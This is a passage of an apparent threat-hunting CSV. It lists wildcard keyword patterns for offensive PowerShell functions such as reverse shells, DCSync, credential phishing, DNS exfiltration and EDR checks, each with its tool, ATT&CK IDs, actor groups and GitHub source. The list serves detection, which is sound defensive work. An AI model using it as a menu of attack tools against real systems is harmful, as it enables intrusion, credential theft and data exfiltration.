- T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*invoke-checklocaladminaccess*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*Invoke-ClipboardMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Invoke-ConPtyShell.ps1*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*Invoke-CreateRemoteThread*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-CredentialFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-CredentialGuardCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialsPhish*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-DAFT.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-daisychain*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-DCOM.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-dcompayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-DCSync*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DefenderExclusionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DinvokeKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-DllHijackingCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-DllHijackingCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DllInjection*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DllInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-DNSExfiltrator*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" +"*Invoke-DNSUpdate.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Invoke-DomainHarvest*","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1595 T1114 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-DomainHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-DomainPasswordSpray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-DOSfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. (White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html)","T1027 - T1140 - T1059","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-DOSfuscation","1","1","N/A","N/A","8","744","129","2018-03-27T12:16:18Z","2018-03-19T16:47:54Z" +"*Invoke-DriverCoInstallersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DumpOWAMailboxViaMSGraphApi*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*invoke-edrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-EDRChecker.ps1*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Invoke-EgressCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EgressCheck.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 